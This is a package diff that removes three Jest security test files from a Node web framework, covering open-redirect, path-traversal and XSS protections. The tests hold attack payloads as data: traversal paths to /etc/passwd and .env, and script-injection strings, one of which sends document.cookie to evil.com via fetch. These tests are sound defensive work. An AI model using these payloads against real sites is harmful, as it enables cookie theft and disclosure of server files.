mastercontroller 1.3.5 → 1.3.6

package/test/security/https.test.js

@@ -1,214 +0,0 @@
-// HTTPS and Open Redirect Protection Tests
-const master = require('../../MasterControl');
-require('../../MasterAction');
-
-describe('HTTPS and Open Redirect Protection', () => {
-
-	class MockController {
-		constructor() {
-			Object.assign(this, master.controllerExtensions);
-			this.__requestObject = {
-				request: {
-					connection: {},
-					headers: {}
-				},
-				response: {
-					_headerSent: false,
-					headersSent: false,
-					writeHead: jest.fn(),
-					end: jest.fn(),
-					setHeader: jest.fn()
-				},
-				pathName: '/login'
-			};
-		}
-
-		redirectTo(url) {
-			this.__requestObject.response.writeHead(302, { 'Location': url });
-			this.__requestObject.response.end();
-		}
-
-		returnError(code, message) {
-			this.__requestObject.response.writeHead(code, { 'Content-Type': 'application/json' });
-			this.__requestObject.response.end(JSON.stringify({ error: message }));
-		}
-	}
-
-	describe('requireHTTPS() - Open Redirect Fix', () => {
-		beforeEach(() => {
-			// Setup test environment
-			master.env = master.env || {};
-			master.env.server = {
-				hostname: 'example.com',
-				httpsPort: 443
-			};
-		});
-
-		test('should NOT use Host header from request', () => {
-			const controller = new MockController();
-			controller.__requestObject.request.connection.encrypted = false;
-			controller.__requestObject.request.headers.host = 'evil.com';
-
-			controller.requireHTTPS();
-
-			// Should redirect to configured host, NOT Host header
-			const writeHeadCalls = controller.__requestObject.response.writeHead.mock.calls;
-			const redirectCall = writeHeadCalls.find(call => call[0] === 302);
-
-			expect(redirectCall).toBeTruthy();
-			expect(redirectCall[1].Location).toBe('https://example.com/login');
-			expect(redirectCall[1].Location).not.toContain('evil.com');
-		});
-
-		test('should use configured hostname', () => {
-			const controller = new MockController();
-			controller.__requestObject.request.connection.encrypted = false;
-
-			master.env.server.hostname = 'myapp.com';
-
-			controller.requireHTTPS();
-
-			const writeHeadCalls = controller.__requestObject.response.writeHead.mock.calls;
-			const redirectCall = writeHeadCalls.find(call => call[0] === 302);
-
-			expect(redirectCall[1].Location).toBe('https://myapp.com/login');
-		});
-
-		test('should include port if not 443', () => {
-			const controller = new MockController();
-			controller.__requestObject.request.connection.encrypted = false;
-
-			master.env.server.hostname = 'example.com';
-			master.env.server.httpsPort = 8443;
-
-			controller.requireHTTPS();
-
-			const writeHeadCalls = controller.__requestObject.response.writeHead.mock.calls;
-			const redirectCall = writeHeadCalls.find(call => call[0] === 302);
-
-			expect(redirectCall[1].Location).toBe('https://example.com:8443/login');
-		});
-
-		test('should return error if hostname not configured', () => {
-			const controller = new MockController();
-			controller.__requestObject.request.connection.encrypted = false;
-
-			master.env.server.hostname = 'localhost';
-
-			const result = controller.requireHTTPS();
-
-			expect(result).toBe(false);
-			expect(controller.__requestObject.response.writeHead).toHaveBeenCalledWith(500, expect.any(Object));
-		});
-
-		test('should allow request if already HTTPS', () => {
-			const controller = new MockController();
-			controller.__requestObject.request.connection.encrypted = true;
-
-			const result = controller.requireHTTPS();
-
-			expect(result).toBe(true);
-			expect(controller.__requestObject.response.writeHead).not.toHaveBeenCalled();
-		});
-
-		test('should detect HTTPS from X-Forwarded-Proto header', () => {
-			const controller = new MockController();
-			controller.__requestObject.request.connection.encrypted = false;
-			controller.__requestObject.request.headers['x-forwarded-proto'] = 'https';
-
-			const result = controller.requireHTTPS();
-
-			expect(result).toBe(true);
-		});
-	});
-
-	describe('isSecure()', () => {
-		test('should return true for encrypted connection', () => {
-			const controller = new MockController();
-			controller.__requestObject.request.connection.encrypted = true;
-
-			expect(controller.isSecure()).toBe(true);
-		});
-
-		test('should return true for X-Forwarded-Proto: https', () => {
-			const controller = new MockController();
-			controller.__requestObject.request.headers['x-forwarded-proto'] = 'https';
-
-			expect(controller.isSecure()).toBe(true);
-		});
-
-		test('should return false for HTTP', () => {
-			const controller = new MockController();
-			controller.__requestObject.request.connection.encrypted = false;
-			controller.__requestObject.request.headers['x-forwarded-proto'] = 'http';
-
-			expect(controller.isSecure()).toBe(false);
-		});
-	});
-
-	describe('Real-World Attack Scenarios', () => {
-		beforeEach(() => {
-			master.env = master.env || {};
-			master.env.server = {
-				hostname: 'legitimate.com',
-				httpsPort: 443
-			};
-		});
-
-		test('should prevent phishing via Host header manipulation', () => {
-			const controller = new MockController();
-			controller.__requestObject.request.connection.encrypted = false;
-
-			// Attacker sets malicious Host header
-			controller.__requestObject.request.headers.host = 'phishing-site.com';
-			controller.__requestObject.pathName = '/login';
-
-			controller.requireHTTPS();
-
-			// Should redirect to legitimate site, not attacker's
-			const writeHeadCalls = controller.__requestObject.response.writeHead.mock.calls;
-			const redirectCall = writeHeadCalls.find(call => call[0] === 302);
-
-			expect(redirectCall[1].Location).toBe('https://legitimate.com/login');
-			expect(redirectCall[1].Location).not.toContain('phishing-site.com');
-		});
-
-		test('should prevent redirect to external domain', () => {
-			const controller = new MockController();
-			controller.__requestObject.request.connection.encrypted = false;
-
-			// Attacker tries various Host header values
-			const maliciousHosts = [
-				'evil.com',
-				'attacker.net',
-				'phishing.org',
-				'legitimate.com.evil.com'
-			];
-
-			maliciousHosts.forEach(host => {
-				controller.__requestObject.request.headers.host = host;
-				controller.__requestObject.response.writeHead.mockClear();
-
-				controller.requireHTTPS();
-
-				const writeHeadCalls = controller.__requestObject.response.writeHead.mock.calls;
-				const redirectCall = writeHeadCalls.find(call => call[0] === 302);
-
-				expect(redirectCall[1].Location).toBe('https://legitimate.com/login');
-			});
-		});
-
-		test('should preserve original path in redirect', () => {
-			const controller = new MockController();
-			controller.__requestObject.request.connection.encrypted = false;
-			controller.__requestObject.pathName = '/admin/users/123';
-
-			controller.requireHTTPS();
-
-			const writeHeadCalls = controller.__requestObject.response.writeHead.mock.calls;
-			const redirectCall = writeHeadCalls.find(call => call[0] === 302);
-
-			expect(redirectCall[1].Location).toBe('https://legitimate.com/admin/users/123');
-		});
-	});
-});

package/test/security/path-traversal.test.js

@@ -1,222 +0,0 @@
-// Path Traversal Protection Tests
-const master = require('../../MasterControl');
-require('../../MasterAction');
-require('../../MasterHtml');
-
-describe('Path Traversal Protection', () => {
-
-	describe('MasterAction - returnPartialView()', () => {
-		class MockController {
-			constructor() {
-				Object.assign(this, master.controllerExtensions);
-				this.__requestObject = {
-					response: {
-						_headerSent: false,
-						headersSent: false,
-						writeHead: jest.fn(),
-						end: jest.fn()
-					}
-				};
-			}
-
-			returnError(code, message) {
-				this.__requestObject.response.writeHead(code, { 'Content-Type': 'application/json' });
-				this.__requestObject.response.end(JSON.stringify({ error: message }));
-			}
-		}
-
-		test('should reject ../ path traversal', () => {
-			const controller = new MockController();
-			const result = controller.returnPartialView('../../etc/passwd', {});
-
-			expect(controller.__requestObject.response.writeHead).toHaveBeenCalledWith(400, expect.any(Object));
-			expect(result).toBe('');
-		});
-
-		test('should reject absolute paths', () => {
-			const controller = new MockController();
-			const result = controller.returnPartialView('/etc/passwd', {});
-
-			expect(controller.__requestObject.response.writeHead).toHaveBeenCalledWith(400, expect.any(Object));
-			expect(result).toBe('');
-		});
-
-		test('should reject ~ home directory paths', () => {
-			const controller = new MockController();
-			const result = controller.returnPartialView('~/../../etc/passwd', {});
-
-			expect(controller.__requestObject.response.writeHead).toHaveBeenCalledWith(400, expect.any(Object));
-			expect(result).toBe('');
-		});
-
-		test('should allow safe relative paths', () => {
-			const controller = new MockController();
-			master.root = __dirname;
-
-			// This should not throw (though file may not exist)
-			try {
-				controller.returnPartialView('views/safe/partial.html', {});
-			} catch (e) {
-				// File not found is OK, as long as validation passed
-			}
-
-			// Should not have called returnError with 400 or 403
-			const calls = controller.__requestObject.response.writeHead.mock.calls;
-			const hasSecurityError = calls.some(call => [400, 403].includes(call[0]));
-			expect(hasSecurityError).toBe(false);
-		});
-	});
-
-	describe('MasterAction - returnViewWithoutEngine()', () => {
-		class MockController {
-			constructor() {
-				Object.assign(this, master.controllerExtensions);
-				this.__requestObject = {
-					response: {
-						_headerSent: false,
-						headersSent: false,
-						writeHead: jest.fn(),
-						end: jest.fn()
-					}
-				};
-			}
-
-			returnError(code, message) {
-				this.__requestObject.response.writeHead(code, { 'Content-Type': 'application/json' });
-				this.__requestObject.response.end(JSON.stringify({ error: message }));
-			}
-		}
-
-		test('should reject ../ path traversal', () => {
-			const controller = new MockController();
-			controller.returnViewWithoutEngine('../../../etc/passwd');
-
-			expect(controller.__requestObject.response.writeHead).toHaveBeenCalledWith(400, expect.any(Object));
-		});
-
-		test('should reject absolute paths', () => {
-			const controller = new MockController();
-			controller.returnViewWithoutEngine('/etc/passwd');
-
-			expect(controller.__requestObject.response.writeHead).toHaveBeenCalledWith(400, expect.any(Object));
-		});
-	});
-
-	describe('MasterHtml - renderPartial()', () => {
-		let html;
-
-		beforeEach(() => {
-			html = master.viewList.html;
-			master.router.currentRoute = {
-				root: __dirname
-			};
-		});
-
-		test('should reject ../ path traversal', () => {
-			const result = html.renderPartial('../../etc/passwd', {});
-			expect(result).toBe('<!-- Invalid path -->');
-		});
-
-		test('should reject absolute paths', () => {
-			const result = html.renderPartial('/etc/passwd', {});
-			expect(result).toBe('<!-- Invalid path -->');
-		});
-
-		test('should reject ~ home directory', () => {
-			const result = html.renderPartial('~/config', {});
-			expect(result).toBe('<!-- Invalid path -->');
-		});
-
-		test('should allow safe relative paths', () => {
-			// Safe path should not return error
-			try {
-				const result = html.renderPartial('partials/safe.html', {});
-				// May return "not found" comment, but not "invalid path"
-				expect(result).not.toBe('<!-- Invalid path -->');
-			} catch (e) {
-				// File not found is OK
-			}
-		});
-	});
-
-	describe('MasterHtml - renderStyles()', () => {
-		let html;
-
-		beforeEach(() => {
-			html = master.viewList.html;
-			master.router.currentRoute = {
-				root: __dirname,
-				isComponent: false
-			};
-		});
-
-		test('should reject ../ in folder name', () => {
-			const result = html.renderStyles('../../../etc', ['css']);
-			expect(result).toBe('');
-		});
-
-		test('should reject absolute paths in folder name', () => {
-			const result = html.renderStyles('/etc/passwd', ['css']);
-			expect(result).toBe('');
-		});
-
-		test('should allow safe folder names', () => {
-			const result = html.renderStyles('pages', ['css']);
-			// Should return empty string if no files, but not fail validation
-			expect(typeof result).toBe('string');
-		});
-	});
-
-	describe('MasterHtml - renderScripts()', () => {
-		let html;
-
-		beforeEach(() => {
-			html = master.viewList.html;
-			master.router.currentRoute = {
-				root: __dirname,
-				isComponent: false
-			};
-		});
-
-		test('should reject ../ in folder name', () => {
-			const result = html.renderScripts('../../config', ['js']);
-			expect(result).toBe('');
-		});
-
-		test('should reject absolute paths', () => {
-			const result = html.renderScripts('/etc', ['js']);
-			expect(result).toBe('');
-		});
-
-		test('should allow safe folder names', () => {
-			const result = html.renderScripts('components', ['js']);
-			expect(typeof result).toBe('string');
-		});
-	});
-
-	describe('Real-World Attack Scenarios', () => {
-		test('should prevent reading /etc/passwd', () => {
-			const html = master.viewList.html;
-			master.router.currentRoute = { root: '/var/www/app' };
-
-			const result = html.renderPartial('../../../../../../../etc/passwd', {});
-			expect(result).toBe('<!-- Invalid path -->');
-		});
-
-		test('should prevent reading application config', () => {
-			const html = master.viewList.html;
-			master.router.currentRoute = { root: '/var/www/app' };
-
-			const result = html.renderPartial('../../config/database.yml', {});
-			expect(result).toBe('<!-- Invalid path -->');
-		});
-
-		test('should prevent reading .env files', () => {
-			const html = master.viewList.html;
-			master.router.currentRoute = { root: '/var/www/app' };
-
-			const result = html.renderPartial('../../.env', {});
-			expect(result).toBe('<!-- Invalid path -->');
-		});
-	});
-});

package/test/security/xss.test.js

@@ -1,190 +0,0 @@
-// XSS Protection Tests for MasterHtml.js
-const master = require('../../MasterControl');
-require('../../MasterHtml');
-
-describe('XSS Protection in Form Helpers', () => {
-	let html;
-
-	beforeEach(() => {
-		// Create html instance (it's extended to master.viewList)
-		html = master.viewList.html;
-	});
-
-	describe('linkTo()', () => {
-		test('should escape malicious script in name', () => {
-			const result = html.linkTo('<script>alert("XSS")</script>', '/safe');
-			expect(result).not.toContain('<script>');
-			expect(result).toContain('&lt;script&gt;');
-		});
-
-		test('should escape malicious javascript in href', () => {
-			const result = html.linkTo('Click', 'javascript:alert("XSS")');
-			expect(result).toContain('href="javascript');
-			expect(result).not.toContain('href=javascript'); // Should be quoted
-		});
-
-		test('should escape quote injection', () => {
-			const result = html.linkTo('Click', '" onmouseover="alert(\'XSS\')"');
-			expect(result).toContain('&quot;');
-			expect(result).not.toContain('onmouseover=');
-		});
-	});
-
-	describe('imgTag()', () => {
-		test('should escape XSS in alt attribute', () => {
-			const result = html.imgTag('<script>alert("XSS")</script>', '/image.jpg');
-			expect(result).not.toContain('<script>');
-			expect(result).toContain('&lt;script&gt;');
-		});
-
-		test('should escape onerror handler', () => {
-			const result = html.imgTag('test', '/image.jpg onerror=alert(1)');
-			expect(result).toContain('&quot;');
-			expect(result).toMatch(/src=".*onerror.*"/); // Should be quoted
-		});
-
-		test('should have proper attribute quoting', () => {
-			const result = html.imgTag('test', '/image.jpg');
-			expect(result).toMatch(/src="[^"]+"/);
-			expect(result).toMatch(/alt="[^"]+"/);
-		});
-	});
-
-	describe('textFieldTag()', () => {
-		test('should escape malicious name', () => {
-			const result = html.textFieldTag('<script>alert(1)</script>', {});
-			expect(result).not.toContain('<script>');
-			expect(result).toContain('&lt;script&gt;');
-		});
-
-		test('should escape malicious attributes', () => {
-			const result = html.textFieldTag('username', {
-				value: '"><script>alert(1)</script><input type="hidden'
-			});
-			expect(result).not.toContain('<script>');
-			expect(result).toContain('&quot;&gt;&lt;script&gt;');
-		});
-
-		test('should properly quote all attributes', () => {
-			const result = html.textFieldTag('test', { value: 'normal', class: 'form-control' });
-			expect(result).toMatch(/name="[^"]+"/);
-			expect(result).toMatch(/value="[^"]+"/);
-			expect(result).toMatch(/class="[^"]+"/);
-		});
-	});
-
-	describe('hiddenFieldTag()', () => {
-		test('should escape malicious value', () => {
-			const result = html.hiddenFieldTag('test', '" onclick="alert(\'XSS\')"', {});
-			expect(result).not.toContain('onclick=');
-			expect(result).toContain('&quot;');
-		});
-
-		test('should escape additional attributes', () => {
-			const result = html.hiddenFieldTag('id', '123', {
-				'data-foo': '"><script>alert(1)</script>'
-			});
-			expect(result).not.toContain('<script>');
-		});
-	});
-
-	describe('textAreaTag()', () => {
-		test('should escape message content', () => {
-			const result = html.textAreaTag('comment', '<script>alert("XSS")</script>', {});
-			expect(result).not.toContain('<script>');
-			expect(result).toContain('&lt;script&gt;');
-		});
-
-		test('should escape attributes', () => {
-			const result = html.textAreaTag('comment', 'safe', {
-				placeholder: '"><script>alert(1)</script>'
-			});
-			expect(result).not.toContain('<script>');
-		});
-	});
-
-	describe('submitButton()', () => {
-		test('should escape button name', () => {
-			const result = html.submitButton('<script>alert(1)</script>', {});
-			expect(result).not.toContain('<script>');
-			expect(result).toContain('&lt;script&gt;');
-		});
-
-		test('should escape attributes', () => {
-			const result = html.submitButton('Submit', {
-				onclick: 'alert(1)'
-			});
-			expect(result).toContain('onclick="alert(1)"'); // Escaped and quoted
-		});
-	});
-
-	describe('emailField()', () => {
-		test('should escape malicious attributes', () => {
-			const result = html.emailField('email', {
-				value: '"><script>alert(1)</script>'
-			});
-			expect(result).not.toContain('<script>');
-		});
-	});
-
-	describe('numberField()', () => {
-		test('should escape min/max/step values', () => {
-			const result = html.numberField('age', '"><script>alert(1)</script>', '100', '1', {});
-			expect(result).not.toContain('<script>');
-			expect(result).toContain('&quot;&gt;&lt;script&gt;');
-		});
-	});
-
-	describe('javaScriptSerializer()', () => {
-		test('should escape closing script tags', () => {
-			const data = { comment: '</script><script>alert("XSS")</script>' };
-			const result = html.javaScriptSerializer('userData', data);
-
-			// Should not contain unescaped </script>
-			expect(result).not.toMatch(/<\/script><script>/);
-			// Should contain escaped version
-			expect(result).toContain('\\u003c/script\\u003e');
-		});
-
-		test('should escape < and > characters', () => {
-			const data = { html: '<div>test</div>' };
-			const result = html.javaScriptSerializer('config', data);
-
-			expect(result).toContain('\\u003c');
-			expect(result).toContain('\\u003e');
-		});
-
-		test('should escape variable name', () => {
-			const result = html.javaScriptSerializer('<script>alert(1)</script>', { test: 'data' });
-			expect(result).toContain('&lt;script&gt;');
-		});
-	});
-
-	describe('Real-World Attack Scenarios', () => {
-		test('should prevent stored XSS attack', () => {
-			// Simulate stored XSS from database
-			const userComment = '<img src=x onerror=alert(document.cookie)>';
-			const result = html.textAreaTag('comment', userComment, {});
-
-			expect(result).not.toContain('onerror=');
-			expect(result).toContain('&lt;img');
-		});
-
-		test('should prevent reflected XSS attack', () => {
-			// Simulate reflected XSS from URL parameter
-			const searchQuery = '"><script>fetch("http://evil.com?c="+document.cookie)</script>';
-			const result = html.textFieldTag('search', { value: searchQuery });
-
-			expect(result).not.toContain('<script>');
-			expect(result).not.toContain('fetch(');
-		});
-
-		test('should prevent DOM-based XSS', () => {
-			const maliciousUrl = 'javascript:eval(atob("YWxlcnQoMSk="))';
-			const result = html.linkTo('Click', maliciousUrl);
-
-			// Should be quoted and escaped
-			expect(result).toMatch(/href="[^"]*"/);
-		});
-	});
-});